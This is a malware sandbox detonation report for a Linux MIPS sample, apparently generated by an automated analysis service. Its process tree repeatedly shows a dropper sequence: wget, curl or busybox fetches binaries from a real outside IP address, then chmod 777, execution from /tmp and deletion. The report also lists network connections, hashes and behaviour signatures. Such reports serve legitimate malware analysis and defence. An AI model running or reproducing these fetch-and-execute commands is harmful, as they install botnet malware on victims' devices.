[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/761-1-0xb6778000-0xb6789044-memory.dmp
memory/824-2-0xb674f000-0xb6760044-memory.dmp
memory/896-3-0xb66fe000-0xb670f044-memory.dmp
memory/936-4-0xb672d000-0xb673e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
debian9-mipsbe-20240729-en
Max time kernel
74s
Max time network
76s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
